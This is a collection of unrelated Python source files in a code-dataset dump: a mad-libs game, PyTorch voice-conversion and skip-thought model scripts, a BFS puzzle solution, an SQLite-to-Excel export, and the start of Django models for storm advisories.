colored\nfrom os import system\nimport readline\nimport random\nimport re\n\nclass Mad_Lib:\n def __init__(self, mad_lib = None, name = None):\n self.name = name;\n self.MAD_LIB = mad_lib\n self.mad_lib = mad_lib\n self.user_inputs = {}\n \n # Check if user input is not blank and the correct pos, if avaliable.\n def is_valid(self, pos, user_input):\n if type(user_input) == str:\n if user_input == '' or re.match('\\s+', user_input):\n return False\n else: \n return True\n\n # Take any text inclosed in [] and inserts it into the inputs array \n def get_inputs(self):\n # Get the inputs from the mad lib and set each input to it's pos tupal value\n # Thanks to Kevin for helping me refactor the regex key from '\\[([a-z]([a-z]|\\s)+)\\]' to '\\[(\\w(\\w|\\s)+)\\]' so they can accept more than just lowercase letters\n tuple_inputs = re.findall('\\[(\\w(\\w|\\s)+)\\]', self.mad_lib)\n for index, mad_lib_tuple in enumerate(tuple_inputs): tuple_inputs[index] = mad_lib_tuple[0]\n # Get proper pos user input, if input is a pos, for each input\n for mad_lib_input in tuple_inputs: \n user_input = input(f'{mad_lib_input}: ') \n while not self.is_valid(mad_lib_input, user_input):\n user_input = input(f'Invaled, input is not a {mad_lib_input}: ')\n if (mad_lib_input not in self.user_inputs): \n self.user_inputs[mad_lib_input] = [colored(user_input, 'green')] \n else:\n self.user_inputs[mad_lib_input].append(colored(user_input, 'green'))\n\n # Get random words to be used as inputs from the /usr/share/dict/words file\n def get_random_inputs(self):\n inputs = re.findall('\\[(\\w(\\w|\\s)+)\\]', self.mad_lib)\n for index, mad_lib_tuple in enumerate(inputs): inputs[index] = mad_lib_tuple[0]\n words = open('/usr/share/dict/words', 'r').readlines()\n for index, word in enumerate(words): words[index] = re.sub('(\\\\n)', '', word)\n word_inputs = []\n for i in range(len(inputs)):\n word_inputs.append(colored(random.choice(words), 'green'))\n self.user_inputs = word_inputs\n\n # Subbsitute bracket inclosed text with user input\n def create(self):\n self.get_inputs()\n for key in self.user_inputs.keys():\n # Shuffle the user input for each pos and insert them into mad lib\n shuffled_list = random.sample(self.user_inputs[key], len(self.user_inputs[key]))\n for index, word in enumerate(reversed(list(shuffled_list))):\n self.mad_lib = re.sub(f'\\[{key}\\]', word, self.mad_lib, 1)\n \n def random_create(self):\n self.get_random_inputs()\n for index, word in enumerate(self.user_inputs):\n self.mad_lib = re.sub('\\[(\\w(\\w|\\s)+)\\]', word, self.mad_lib, 1)\n\n def print(self):\n system('clear')\n print(self.name)\n print(self.mad_lib)\n\n def start(self, create_type):\n if self.mad_lib and self.name and create_type == 'normal':\n print(self.name)\n self.create()\n self.print()\n self.mad_lib = self.MAD_LIB\n self.user_inputs = {}\n elif self.mad_lib and self.name and create_type == 'random':\n self.random_create()\n self.print()\n self.mad_lib = self.MAD_LIB\n self.user_inputs = {}\n else: \n print('Error, missing values')\n\n\nkevin_mad_lib = '''\n Kevin is a very [adjective] [noun], he gets really [verb] when people have \n the same name as him. Sometimes, Kevin enjoys [outdoor activity] with \n his friend [noun].\n '''\ntortoise_and_the_hare = '''\n Once upon a time there was a hare who, [verb] how he could [action verb] [comparative adjective] \n than anyone else. He always would be [word that ends in ing] tortoise for its [adjective]. Then \n one day, the [adjective] tortoise [verb] back: “Who do you think you are? There’s no denying \n you’re [adjective], but even you can be [adjective]!” The hare [verb] with [noun]. “[verb] \n in a [competition]? By whom? Not you, surely! I bet there’s nobody in the [noun] that can win \n against me, I’m so [adjective]. Now, why don’t you [verb] off?”\n '''\n\nk_mad_lib = Mad_Lib(kevin_mad_lib, 'Kevin')\ntath_mad_lib = Mad_Lib(tortoise_and_the_hare, 'Tortoise and the Hare')\nmad_libs = [k_mad_lib, tath_mad_lib]\n\nsystem('clear')\nshould_continue = True\nwhile should_continue:\n for index, mad_lib in enumerate(mad_libs):\n print('{} {}'.format(index, mad_lib.name))\n\n user_input = input(\"Enter a mad lib's index to start, or Q to quit: \")\n while user_input != '' and re.match('\\s+', user_input):\n user_input = input(f\"Index is invaled, try again or hit Q to quit: \")\n system('clear')\n\n if user_input.isnumeric():\n print('Would you like enter your own inputs? Y/n')\n user_selection = input()\n if user_selection == 'Y' or user_selection == 'y' or re.match('(\\s+)', user_selection):\n mad_libs[int(user_input)].start('normal')\n elif user_selection == 'N' or user_selection == 'n': \n mad_libs[int(user_input)].start('random')\n else:\n print('Unknown Input')\n\n elif user_input == 'Q' or user_input == 'q':\n system('clear')\n should_continue = False\n\n else: \n print('Invaled input')","sub_path":"Projects/mad_lib/madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"337159246","text":"import os, sys\nimport argparse\nimport numpy as np\nimport time\nimport torch\nimport torch.optim as optim\nfrom loss import LogManager, calc_gaussprob, calc_kl_vae, nllloss, calc_entropy, calc_err, l1loss, calc_entropy_log\nimport pickle\nimport model\nfrom itertools import combinations\nimport data_manager as dm\nimport json\n\ndef load_pickle(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\ndef load_sp(feat_dir, num_mcep=36):\n feat_path = os.path.join(feat_dir, 'feats.p')\n with open(feat_path, 'rb') as f:\n sp, sp_m, sp_s, logf0_m, logf0_s = pickle.load(f)\n return sp\n\ndef load_ppg(feat_dir, num_mcep=36):\n ppg_path = os.path.join(feat_dir, 'ppg{}.p'.format(num_mcep))\n with open(ppg_path, 'rb') as f:\n ppg = pickle.load(f)\n return ppg\n\ndef calc_parm_num(model):\n total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n return total_params\n\ndef update_parm(opt_list, loss):\n for opt in opt_list:\n opt.zero_grad()\n loss.backward()\n for opt in opt_list:\n opt.step()\n\ndef set_DEC(DEC, mode, is_MD=False):\n assert mode in ['train', 'eval']\n if is_MD:\n for dec in DEC.values():\n if mode=='train':\n dec.train()\n if mode==\"eval\":\n dec.eval()\n else:\n if mode=='train':\n DEC.train()\n if mode==\"eval\":\n DEC.eval()\n \n\n\"\"\"\nVAE 1: Vanila\nVAE 2: Decoder Speaker vector\nVAE 3: All Speaker vector (S2S)\nMD: Multi Decoder (S2S)\n\n============ A2A ============\n\nSI: Minimize speaker info (cross entropy) of latent \nI: Maximize latent entropy\nLI: Maximize ppg info of latent \n\n============ A2B ============\n\nAC: speaker loss in converted x\nSC: l1(latent - cycle latent)\nCC: cycle loss\n\nGAN : discriminator\n\"\"\"\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--seed', type=int, default=0)\nparser.add_argument('--model_dir', default='')\nparser.add_argument('--lr', type=float, default=0)\nparser.add_argument('--c_lr', type=float, default=2.5*1e-5)\n\nparser.add_argument('--epochs',type=int, default=2000)\n\nparser.add_argument('--spk',type=str, default='')\n\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\ntorch.backends.cudnn.deterministic=True\ntorch.backends.cudnn.benchmark=False\nnp.random.seed(args.seed)\n\n\n# Data load\n# SPK_LIST = ['F1','M1','F2','M2']\n# SPK_LIST = ['VCC2SF1','VCC2SF2','VCC2SM1','VCC2SM2']\nif args.spk != \"\":\n SPK_LIST = ['VCC2SF1','VCC2SF2','VCC2SM1','VCC2SM2','VCC2SF3','VCC2SF4','VCC2SM3','VCC2SM4'] \nelse:\n SPK_LIST = ['VCC2SF1','VCC2SF2','VCC2SM1','VCC2SM2'] \nTOTAL_SPK_NUM = len(SPK_LIST)\n\nPPG_DICT_TRAIN = {\n spk_id:load_ppg(os.path.join(\"data\",\"train\", spk_id)) \n for spk_id in SPK_LIST\n}\n\nPPG_DICT_DEV = {\n spk_id:load_ppg(os.path.join(\"data\",\"dev\", spk_id)) \n for spk_id in SPK_LIST\n}\n\nSP_DICT_TRAIN = {\n spk_id:load_sp(os.path.join(\"data\",\"train\", spk_id)) \n for spk_id in SPK_LIST\n}\n\nSP_DICT_DEV = dict()\nfor spk_id in SPK_LIST:\n sps = []\n for _, _, file_list in os.walk(os.path.join(\"data\", \"dev\", spk_id)):\n for file_id in file_list:\n utt_id = file_id.split(\".\")[0]\n if utt_id == \"ppg36\":\n continue\n file_path = os.path.join(\"data\", \"dev\", spk_id, file_id)\n _,coded_sp, f0, ap = load_pickle(file_path)\n sps.append(coded_sp)\n SP_DICT_DEV[spk_id]=sps\n# Model initilaization\nmodel_dir = args.model_dir\n\nprint(model_dir)\nos.makedirs(model_dir, exist_ok=True)\n\nlatent_dim=8\n\n\n# lr = 1e-3\nc_lr = 1e-5*2.5\n\nAC = model.DataClassifier(latent_dim=latent_dim, label_num=TOTAL_SPK_NUM)\nAC.cuda()\nAC_opt = optim.Adam(AC.parameters(), lr=c_lr)\nAC_sch = optim.lr_scheduler.ExponentialLR(AC_opt, 0.5)\n\n# 8 16\n# (0-499) (500-999)\ntotal_time = 0\n\nmin_dev_loss = 9999999999999999\nmin_epoch = 0\nd_epoch = 1\n\nlm = LogManager()\nlm.alloc_stat_type_list([\"train_loss\", \"train_acc\", \"dev_loss\", \"dev_acc\"])\npretrain_epochs = args.epochs\nbatch_size = 8\nprint(\"Train AC\")\nfor epoch in range(pretrain_epochs):\n print(\"AC EPOCH: {} LearningRate: {}\".format(epoch, AC_sch.get_last_lr()[0]))\n lm.init_stat() \n # Train\n AC.train()\n train_loader = dm.feat_loader_single(SP_DICT_TRAIN, batch_size, shuffle=True)\n for self_idx, coded_sp in train_loader:\n\n x = dm.make_spk_target(self_idx, batch_size, is_MD=False)\n\n pred_x = AC(coded_sp)\n spk_loss = nllloss(pred_x, x)\n spk_err = calc_err(pred_x, x)\n\n AC_opt.zero_grad()\n spk_loss.backward()\n AC_opt.step()\n\n lm.add_torch_stat(\"train_loss\", spk_loss)\n lm.add_torch_stat(\"train_acc\", 1.0 - spk_err)\n\n print(\"Train:\", end=' ')\n lm.print_stat()\n lm.init_stat()\n # Dev\n AC.eval()\n dev_loader = dm.feat_loader_single(SP_DICT_DEV, batch_size, shuffle=False)\n for self_idx, coded_sp in dev_loader:\n\n x = dm.make_spk_target(self_idx, batch_size, is_MD=False)\n\n pred_x = AC(coded_sp)\n spk_loss = nllloss(pred_x, x)\n spk_err = calc_err(pred_x, x)\n\n lm.add_torch_stat(\"dev_loss\", spk_loss)\n lm.add_torch_stat(\"dev_acc\", 1.0 - spk_err)\n \n print(\"DEV:\", end=' ')\n lm.print_stat()\n print(\".....................\")\n # AC_sch.step()\n AC.eval()\n\ntorch.save(AC.state_dict(), os.path.join(model_dir,\"ac_{}.pt\".format(pretrain_epochs)))\n\n\n","sub_path":"exp/ac/pretrain_ac.py","file_name":"pretrain_ac.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"223980408","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.dataloader import _use_shared_memory\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nfrom collections import namedtuple\nimport torch.nn.utils.weight_norm as weightNorm\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport torch.autograd as autograd\n\nclass STEncoder(nn.Module):\n def __init__(self, num_layers, hidden_size, bidirection, embedding_dim):\n super(STEncoder, self).__init__()\n \n self.num_layers = num_layers\n self.thought_size = hidden_size\n self.direction = 1\n if bidirection:\n self.direction = 2\n \n self.embedding_dim = embedding_dim\n \n self.rnn = nn.LSTM(input_size=self.embedding_dim, hidden_size=self.thought_size, num_layers=self.num_layers, batch_first=False, bidirectional=True)\n \n def hidden_init(self, batch_size): \n if torch.cuda.is_available():\n return (autograd.Variable(torch.zeros(self.direction*self.num_layers, batch_size, self.thought_size).cuda()),\n autograd.Variable(torch.zeros(self.direction*self.num_layers, batch_size, self.thought_size).cuda()))\n return (autograd.Variable(torch.zeros(self.direction*self.num_layers, batch_size, self.thought_size)),\n autograd.Variable(torch.zeros(self.direction*self.num_layers, batch_size, self.thought_size))) \n \n def forward(self, input, inputLenghts):\n packedInputX = pack_padded_sequence(input, inputLenghts, batch_first = False)\n inputX, self.hidden = self.rnn(packedInputX)\n padOutputX, _ = pad_packed_sequence(inputX)\n output_ofLastHiddenState = self.hidden[0].clone()\n \n output_ofLastHiddenState = torch.mean(output_ofLastHiddenState, dim = 0)\n \n return output_ofLastHiddenState\n\nclass STDuoDecoderAttn(nn.Module):\n def __init__(self, hidden_size, embedding_dim, thought_size, vocab_size):\n super(STDuoDecoderAttn, self).__init__()\n self.hidden_size = hidden_size\n self.embedding_dim = embedding_dim\n self.thought_size = thought_size\n self.num_embeddings = vocab_size ## give current ones \n \n #Hidden units\n hidden1 = torch.zeros(1, self.hidden_size)\n hidden2 = torch.zeros(1, self.hidden_size)\n if torch.cuda.is_available():\n hidden1 = hidden1.cuda()\n hidden2 = hidden2.cuda()\n \n self.hidden1 = nn.Parameter(hidden1)\n self.hidden2 = nn.Parameter(hidden2)\n \n ##LSTM cells for the decoder\n self.lstmcell_prev = nn.LSTMCell(self.thought_size+self.embedding_dim, self.hidden_size)\n self.lstmcell_next = nn.LSTMCell(self.thought_size+self.embedding_dim, self.hidden_size)\n \n self.wordProject = nn.Linear(in_features=self.hidden_size, out_features=self.num_embeddings)\n self.init_weights()\n \n def init_weights(self):\n initrange = 0.1\n self.wordProject.bias.data.fill_(0)\n self.wordProject.weight.data.uniform_(-initrange, initrange)\n \n def forward(self, inputPrev, inputNext, context):\n hidden10 = self.hidden1.expand(inputPrev.size()[1], -1).contiguous()\n hidden20 = self.hidden2.expand(inputNext.size()[1], -1).contiguous()\n \n c10 = Variable(torch.zeros(inputPrev.size(1), self.hidden_size), requires_grad=False)\n c20 = Variable(torch.zeros(inputNext.size(1), self.hidden_size), requires_grad=False) \n if torch.cuda.is_available():\n c10 = Variable(torch.zeros(inputPrev.size(1), self.hidden_size).cuda(), requires_grad=False)\n c20 = Variable(torch.zeros(inputNext.size(1), self.hidden_size).cuda(), requires_grad=False)\n\n ## geting the context for first time from hidden unit\n #context_prev = self.attentionQuery(hidden10, keys, values)\n \n logits_prev = []\n ##concatenate the context and embedding[0]\n for i in np.arange(0, inputPrev.size()[0]):\n output_curr = torch.cat((inputPrev[i], context), 1)\n hidden10, _ = self.lstmcell_prev(output_curr, (hidden10, c10))\n \n projection_out = self.wordProject(hidden10)\n logits_prev.append(projection_out)\n #context_prev = self.attentionQuery(hidden10, keys, values)\n \n ## Project layer\n logits_prev = torch.stack(logits_prev)\n \n ## geting the context for first time from hidden unit\n #context_prev = self.attentionQuery(context, keys, values)\n \n logits_next = []\n ##concatenate the context and embedding[0]\n for i in np.arange(0, inputNext.size()[0]):\n output_curr = torch.cat((inputNext[i], context), 1)\n hidden20, _ = self.lstmcell_next(output_curr, (hidden20, c20))\n \n projection_out = self.wordProject(hidden20)\n logits_next.append(projection_out)\n #context_prev = self.attentionQuery(hidden20, keys, values)\n \n ## Project layer\n logits_next = torch.stack(logits_next) \n\n return logits_prev, logits_next\n \n\nclass UniSKIP_variant(nn.Module):\n def __init__(self, encoder_model, decoder_model, embedding_dim, vocab_size):\n super(UniSKIP_variant, self).__init__()\n self.encoder = encoder_model\n self.decoder = decoder_model\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n \n self.wordembed = nn.Embedding(num_embeddings=self.vocab_size, embedding_dim=self.embedding_dim)\n self.init_weights()\n \n def init_weights(self):\n initrange = 0.1\n self.wordembed.bias.data.fill_(0)\n self.wordembed.weight.data.uniform_(-initrange, initrange)\n \n def forward(self, inputCurr, inputLenghts, inputPrev, inputNext):\n \n # Get the thought of the current sentence\n word_embed_curr = F.tanh(self.wordembed(inputCurr))\n output_ofLastHiddenState = self.encoder(word_embed_curr, inputLenghts)\n \n # Get the embedding for prev and next sentence \n word_embed_prev = F.tanh(self.wordembed(inputPrev)) \n word_embed_next = F.tanh(self.wordembed(inputNext))\n \n logits_prev, logits_next = self.decoder(word_embed_prev, word_embed_next, output_ofLastHiddenState)\n \n return output_ofLastHiddenState, logits_prev, logits_next\n \n## USAGE \n##num_layers, hidden_size, bidirection, embedding_dim\nencoder = STEncode(1, 512, True, 128)\n\n##hidden_size, embedding_dim, thought_size, vocab_size\ndecoder = STDuoDecoderAttn(256, 128, 512, 9487)\n\n##encoder_model, decoder_model, embedding_dim, vocab_size\nallmodel = UniSKIP_variant(encoder, decoder, 128, 9487)","sub_path":"ConcurrentThoughtsModel.py","file_name":"ConcurrentThoughtsModel.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"176888397","text":"from torchvision.datasets import MNIST\n\nfrom edflow.data.dataset import DatasetMixin\n\n\nclass Dataset_MNIST(DatasetMixin):\n def __init__(self, config):\n self.config = config\n self.data = MNIST(root=\"./data\", train=True, transform=None, download=True)\n self.im_shape = config.get(\"spatial_size\", [28, 28])\n if isinstance(self.im_shape, int):\n self.im_shape = [self.im_shape] * 2\n\n def __len__(self):\n return len(self.data)\n\n def get_example(self, idx):\n example = dict()\n example[\"image\"] = self.data[idx][0]\n example[\"target\"] = self.data[idx][1]\n return example\n","sub_path":"examples/mnist_pytorch/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"372165414","text":"def aceita():\r\n print (\"ACEITA\")\r\n\r\ndef rejeita():\r\n print (\"REJEITA\")\r\n\r\ndef retorna(z):\r\n matriz = []\r\n for i in range(0, z):\r\n linha = []\r\n for j in range(0, z):\r\n n = 0\r\n linha.append(n)\r\n matriz.append(linha)\r\n return matriz\r\n\r\ndef multiplica(m, n):\r\n tam = len(m)\r\n vazia = retorna(tam)\r\n for i in range(tam):\r\n for j in range(tam):\r\n for k in range(tam):\r\n vazia[i][j] += m[i][k]*n[k][j]\r\n return vazia\r\n\r\ndef multiplicaLinha(m, n):\r\n tam = len(m)\r\n vazia = retorna(tam)\r\n for j in range(tam):\r\n for k in range(tam):\r\n vazia[0][j] += m[0][k]*n[k][j]\r\n return vazia\r\n\r\ndef multiplicaColuna(m, n):\r\n tam = len(m)\r\n vazia = retorna(tam)\r\n for i in range(tam):\r\n for k in range(tam):\r\n vazia[i][0] += m[i][k]*n[k][0]\r\n return vazia\r\n\r\ntomate = eval(input())\r\nalface = eval(input())\r\nn = int (input())\r\npalavras = []\r\nfor i in range (0, n):\r\n palavras.append(input())\r\n\r\npi = retorna(tomate['estados'])\r\nn = retorna(tomate['estados'])\r\nXa = retorna(tomate['estados'])\r\nXb = retorna(tomate['estados'])\r\nX = retorna(tomate['estados'])\r\n\r\npi2 = retorna(alface['estados'])\r\nn2 = retorna(alface['estados'])\r\nXa2 = retorna(alface['estados'])\r\nXb2 = retorna(alface['estados'])\r\nX2 = retorna(alface['estados'])\r\n\r\npi [0][tomate['inicial']] = 1\r\npi2 [0][alface['inicial']] = 1\r\n\r\nfor i in range (0, len(tomate['final'])):\r\n x = tomate['final'][i]\r\n n [x][0] = 1\r\n\r\nfor i in range (0, tomate['estados']):\r\n j = 0\r\n x = tomate ['delta'][i][j]\r\n Xa[i][x] = 1\r\n\r\nfor i in range (0, tomate['estados']):\r\n j = 1\r\n x = tomate ['delta'][i][j]\r\n Xb[i][x] = 1\r\n\r\n\r\n\r\nfor i in range (0, len(alface['final'])):\r\n x = alface['final'][i]\r\n n2 [x][0] = 1\r\n\r\nfor i in range (0, alface['estados']):\r\n j = 0\r\n x = alface['delta'][i][j]\r\n Xa2[i][x] = 1\r\n\r\nfor i in range (0, alface['estados']):\r\n j = 1\r\n x = alface['delta'][i][j]\r\n Xb2[i][x] = 1\r\n\r\n\r\nfor w in palavras:\r\n X = pi[:]\r\n X2 = pi2 [:]\r\n for letras in w:\r\n X = multiplica(X, Xa if letras == 'a' else Xb)\r\n X2 = multiplica(X2, Xa2 if letras == 'a' else Xb2)\r\n X = multiplicaColuna(X, n)\r\n X2 = multiplicaColuna(X2, n2)\r\n if X[0][0] != 0 or X2[0][0] != 0:\r\n aceita()\r\n else:\r\n rejeita()\r\n","sub_path":"Matrizes.py","file_name":"Matrizes.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"327500045","text":"from pathlib import Path\n\nfrom musicscore.musicstream.streamvoice import SimpleFormat\nfrom musicscore.musictree.treescoretimewise import TreeScoreTimewise\nfrom musicxmlunittest import XMLTestCase\n\npath = Path(__file__)\n\n\nclass TestAddPedal(XMLTestCase):\n def setUp(self) -> None:\n self.score = TreeScoreTimewise()\n\n def test_imply(self):\n xml_path = path.parent.joinpath(path.stem + '_imply.xml')\n sf = SimpleFormat(quarter_durations=[1, 1, 1, 1])\n sf.chords[0].add_pedal('start')\n sf.chords[2].add_pedal('stop')\n sf.to_stream_voice().add_to_score(self.score)\n self.score.write(xml_path)\n self.assertCompareFiles(xml_path)\n","sub_path":"tests/musictree/chord/directionstype/test_add_pedal.py","file_name":"test_add_pedal.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551196709","text":"import sys\nfrom collections import deque\n\nN, K = map(int, sys.stdin.readline().split())\nMAX_SIZE = 1000001\n\ndef valid(x):\n return 0 <= x < MAX_SIZE\n\ndef bfs(X,K):\n visited = [0] * MAX_SIZE\n queue = deque()\n queue.append((X,0))\n\n while queue:\n location, time = queue.popleft()\n visited[location] = 1\n\n if location == K:\n return time\n break\n\n for move in [location-1, location+1, 2*location]:\n if valid(move) and visited[move] == 0:\n queue.append((move, time +1))\n return min_time\n\nprint(bfs(N, K))","sub_path":"백준/1697_숨바꼭질.py","file_name":"1697_숨바꼭질.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154744809","text":"import sqlite3\r\nfrom xlsxwriter.workbook import Workbook\r\n\r\nworkbook = Workbook('output2.xlsx')\r\nworksheet = workbook.add_worksheet()\r\n\r\ndb=sqlite3.connect('Finance.db')\r\nconn=db.cursor()\r\n\r\ndata=conn.execute('SELECT * FROM fees_pay')\r\nfor i, row in enumerate(data):\r\n\tprint(row)\r\n\tworksheet.write(i,0, row[0])\r\n\tworksheet.write(i,1, row[1])\r\nworkbook.close()\r\n\r\n\r\ndb.close()","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"517248797","text":"from pytz import timezone, utc\nfrom datetime import datetime, timedelta\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom localflavor.us.us_states import STATE_CHOICES\nfrom localflavor.us.models import USStateField\n#from phonenumber_field.modelfields import PhoneNumberField\nfrom localflavor.us.models import PhoneNumberField\n\nfrom django.db.models.signals import post_save\nfrom django.db.models.signals import post_delete\nfrom django.db.models.signals import pre_save\n\nfrom django.template.loader import render_to_string\n\n#from notification import send_notifications, send_storm_notifications\n\n###############################################################################\n#data access permission (cera.json file)\nUSER_PERMISSION = (\n (\"pub\", \"pub\"),\n (\"nc_ng\", \"nc_ng\"),\n (\"pro\", \"pro\")\n)\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n organization = models.CharField(default='', max_length=100, blank=True)\n job_title = models.CharField(default='', max_length=100, blank=True)\n city = models.CharField(max_length=50, default='', blank=True)\n state = USStateField(choices=STATE_CHOICES, default='', blank=True)\n phone = PhoneNumberField(default='', blank=True)\n cera = models.CharField('User permission', max_length=5, choices=USER_PERMISSION, default='nc_ng')\n\n def __str__(self):\n return self.user.username\n\n class Meta:\n verbose_name = \"User Profile\"\n ordering = ['user__username']\n\ndef create_profile(sender, **kwargs):\n if kwargs ['created']:\n user_profile = UserProfile.objects.create(user=kwargs['instance'])\n\n###############################################################################\nclass storm_year(models.Model):\n\n id = models.AutoField('ID', primary_key=True, unique=True)\n year = models.IntegerField()\n\n dependent_enable_public_dev = models.BooleanField(default=False)\n dependent_enable_public_pro = models.BooleanField(default=False)\n dependent_enable_public_pub = models.BooleanField(default=False)\n dependent_enable_public_ng = models.BooleanField(default=False)\n dependent_enable_public_nc = models.BooleanField(default=False)\n dependent_enable_public_pr = models.BooleanField(default=False)\n dependent_enable_public_ri = models.BooleanField(default=False)\n dependent_enable_public_st = models.BooleanField(default=False)\n dependent_enable_adminmode_dev = models.BooleanField(default=True)\n dependent_enable_adminmode_pro = models.BooleanField(default=True)\n dependent_enable_adminmode_pub = models.BooleanField(default=True)\n dependent_enable_adminmode_ng = models.BooleanField(default=True)\n dependent_enable_adminmode_nc = models.BooleanField(default=True)\n dependent_enable_adminmode_pr = models.BooleanField(default=True)\n dependent_enable_adminmode_ri = models.BooleanField(default=True)\n dependent_enable_adminmode_st = models.BooleanField(default=True)\n dependent_asgs_dev = models.BooleanField(default=False)\n dependent_asgs_pro = models.BooleanField(default=False)\n dependent_asgs_pub = models.BooleanField(default=False)\n dependent_asgs_nc = models.BooleanField(default=False)\n dependent_asgs_ng = models.BooleanField(default=False)\n dependent_asgs_pr = models.BooleanField(default=False)\n dependent_asgs_ri = models.BooleanField(default=False)\n dependent_asgs_st = models.BooleanField(default=False)\n dependent_region_nc_ng = models.BooleanField(default=False)\n dependent_region_nc = models.BooleanField(default=False)\n dependent_region_ng = models.BooleanField(default=False)\n dependent_region_ri = models.BooleanField(default=False)\n dependent_region_pr = models.BooleanField(default=False)\n\n def __unicode__(self):\n return str(self.year)\n\n class Meta:\n #name for class\n verbose_name = \"year\"\n verbose_name_plural = \"Storm Years\"\n ordering = ['-year']\n\n###############################################################################\nclass storm(models.Model):\n\n id = models.AutoField('ID', primary_key=True, unique=True)\n year = models.ForeignKey(storm_year, on_delete=models.CASCADE)\n# storm_number = models.IntegerField('NHC storm number', help_text='Omit leading zeros.')\n storm_number = models.CharField('NHC storm number', max_length=3, help_text='Omit leading zeros.')\n stormname = models.CharField('storm name', max_length=22, null=True, blank=True)\n start_date_utc = models.DateTimeField('First NHC advisory', help_text='Provide the first advisory in CDT date format YYYY-MM-DD and CDT time format HH:MM.', null=True, blank=True)\n last_date_utc = models.DateTimeField('Last NHC advisory', help_text='Provide the last advisory in CDT date format YYYY-MM-DD and CDT time format HH:MM.', null=True, blank=True)\n has_hindcast = models.BooleanField('storm with hindcast (has_hindcast)', default=False)\n\n dependent_enable_public_dev = models.BooleanField(default=False)\n dependent_enable_public_pro = models.BooleanField(default=False)\n dependent_enable_public_pub = models.BooleanField(default=False)\n dependent_enable_public_ng = models.BooleanField(default=False)\n dependent_enable_public_nc = models.BooleanField(default=False)\n dependent_enable_public_pr = models.BooleanField(default=False)\n dependent_enable_public_ri = models.BooleanField(default=False)\n dependent_enable_public_st = models.BooleanField(default=False)\n dependent_enable_adminmode_dev = models.BooleanField(default=True)\n dependent_enable_adminmode_pro = models.BooleanField(default=True)\n dependent_enable_adminmode_pub = models.BooleanField(default=True)\n dependent_enable_adminmode_ng = models.BooleanField(default=True)\n dependent_enable_adminmode_nc = models.BooleanField(default=True)\n dependent_enable_adminmode_pr = models.BooleanField(default=True)\n dependent_enable_adminmode_ri = models.BooleanField(default=True)\n dependent_enable_adminmode_st = models.BooleanField(default=True)\n dependent_asgs_dev = models.BooleanField(default=False)\n dependent_asgs_pro = models.BooleanField(default=False)\n dependent_asgs_pub = models.BooleanField(default=False)\n dependent_asgs_nc = models.BooleanField(default=False)\n dependent_asgs_ng = models.BooleanField(default=False)\n dependent_asgs_pr = models.BooleanField(default=False)\n dependent_asgs_ri = models.BooleanField(default=False)\n dependent_asgs_st = models.BooleanField(default=False)\n dependent_region_nc_ng = models.BooleanField(default=False)\n dependent_region_nc = models.BooleanField(default=False)\n dependent_region_ng = models.BooleanField(default=False)\n dependent_region_ri = models.BooleanField(default=False)\n dependent_region_pr = models.BooleanField(default=False)\n\n def get_storm_name(self):\n if len(self.stormname) > 0:\n return self.stormname\n return self.storm_number\n\n def __unicode__(self):\n return (\"%s %s\" % (str(self.year), self.stormname))\n\n class Meta:\n ordering = ['-start_date_utc']\n\n###############################################################################\nSTORMCLASS_CHOICES = (\n (\"db\", \"Disturbance\"),\n (\"ds\", \"Dissipating\"),\n (\"rem\", \"Remants\"),\n (\"ptc\", \"Potential Tropical Cyclone\"),\n (\"sd\", \"Subtropical Depression\"),\n (\"ss\", \"Subtropical Storm\"),\n (\"pt\", \"Post-Tropical Cyclone\"),\n (\"ex\", \"Extratropical System\"),\n (\"td\", \"Tropical Depression\"),\n (\"ts\", \"Tropical Storm\"),\n (\"hu\", \"Hurricane\")\n)\n\nCATEGORY_CHOICES = (\n (\"db\", \"DS\"), # Disturbance\n (\"ds\", \"DS\"), # Dissipating\n (\"rem\", \"REM\"), # Remants\n (\"ptc\", \"PTC\"), # Potential Tropical Cyclone\n (\"sd\", \"SD\"), # Subtropical Depression\n (\"ss\", \"SS\"), # Subtropical Storm\n (\"td\", \"TD\"), # Tropical Depression\n (\"ts\", \"TS\"), # Tropical Storm\n (\"pt\", \"PT\"), # Post-Tropical Storm\n (\"ex\", \"EX\"), # Extratropical Systems\n (\"1\", \"H1\"), # Hurricane 1\n (\"2\", \"H2\"),\n (\"3\", \"H3\"),\n (\"4\", \"H4\"),\n (\"5\", \"H5\")\n)\n\nclass advisory(models.Model):\n id = models.AutoField('ID', primary_key=True, unique=True)\n advisory = models.CharField('NHC advisory number', max_length=3, help_text='Omit leading zeros.')\n storm = models.ForeignKey(storm, on_delete=models.CASCADE)\n stormclass = models.CharField(max_length=3, choices = STORMCLASS_CHOICES, null=True, blank=True)\n category = models.CharField(max_length=3, choices = 